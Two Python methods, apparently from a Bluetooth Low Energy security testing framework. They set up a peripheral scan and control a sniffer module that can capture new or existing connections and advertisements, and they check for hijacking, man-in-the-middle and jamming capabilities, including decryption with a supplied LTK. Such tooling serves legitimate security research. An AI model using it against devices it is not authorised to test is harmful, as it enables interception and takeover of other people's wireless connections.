def onStart(self): if 'REQUESTS' in self.module.args and utils.integerArg( self.module.args['REQUESTS'], 0) > 0: self.requests = utils.integerArg(self.module.args['REQUESTS']) else: self.requests = MOCK_VALUES['control']['number_requests'] if 'INTERVAL' in self.module.args and utils.integerArg( self.module.args['INTERVAL'], 0) > 0: self.interval = utils.integerArg(self.module.args['INTERVAL']) else: self.interval = MOCK_VALUES['control']['request_time_interval'] if 'PAIRING' in self.module.args: self.pairing = utils.booleanArg(self.module.args['PAIRING']) else: self.pairing = MOCK_VALUES['control']['enable_pairing'] if 'TARGET' in self.module.args and self.module.args['TARGET'] != '': self.target = self.module.args['TARGET'] io.info('Provided target at ' + self.target) self.customConnect() else: self.target = "" if 'NAME' in self.module.args and self.module.args['NAME'] != '': self.searchFor = self.module.args['NAME'] else: self.searchFor = MOCK_VALUES['gap']['localName'] self.module.receiver.onEvent("BLEAdvertisement", callback=self.onAdvertisement) self.module.receiver.setScan(enable=True) io.info('Scanning for slave named "' + self.searchFor + '"') return True
def run(self): if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(self.args["PCAP_FILE"]) else: self.pcap = None self.initEmittersAndReceivers() if self.args["LTK"] != "": ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"])) if utils.booleanArg(self.args["HIJACKING_MASTER"]) and not self.checkHijackingMasterCapabilities(): io.fail("Interfaces provided are not able to hijack a master role.") return self.nok() if utils.booleanArg(self.args["HIJACKING_SLAVE"]) and not self.checkHijackingSlaveCapabilities(): io.fail("Interfaces provided are not able to hijack a slave role.") return self.nok() if utils.booleanArg(self.args["MITMING"]) and not self.checkMitmingCapabilities(): io.fail("Interfaces provided are not able to MITM an established connection.") return self.nok() if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities(): io.fail("Interfaces provided are not able to jam a connection.") return self.nok() if self.args["SNIFFING_MODE"] not in ("newConnections", "advertisements", "existingConnections"): io.fail("You have to set SNIFFING_MODE parameters to: 'newConnections', 'advertisements' or 'existingConnections'") return self.nok() if self.args["SNIFFING_MODE"].upper() == "newConnections".upper(): if self.checkNewConnectionCapabilities(): target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) if self.loadScenario(): io.info("Scenario loaded !") self.startScenario() result = self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"])) if self.scenarioEnabled: self.endScenario() return result else: io.fail("Interfaces provided are not able to sniff new connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper(): if self.checkExistingConnectionCapabilities(): if self.loadScenario(): io.info("Scenario loaded !") self.startScenario() accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None result = self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap) if self.scenarioEnabled: self.endScenario() return result else: io.fail("Interfaces provided are not able to sniff existing connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper(): if self.checkAdvertisementsCapabilities(): if self.loadScenario(): io.info("Scenario loaded !") self.startScenario() target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) result = self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"])) if self.scenarioEnabled: self.endScenario() return result else: io.fail("Interfaces provided are not able to sniff advertisements.") return self.nok() return self.ok()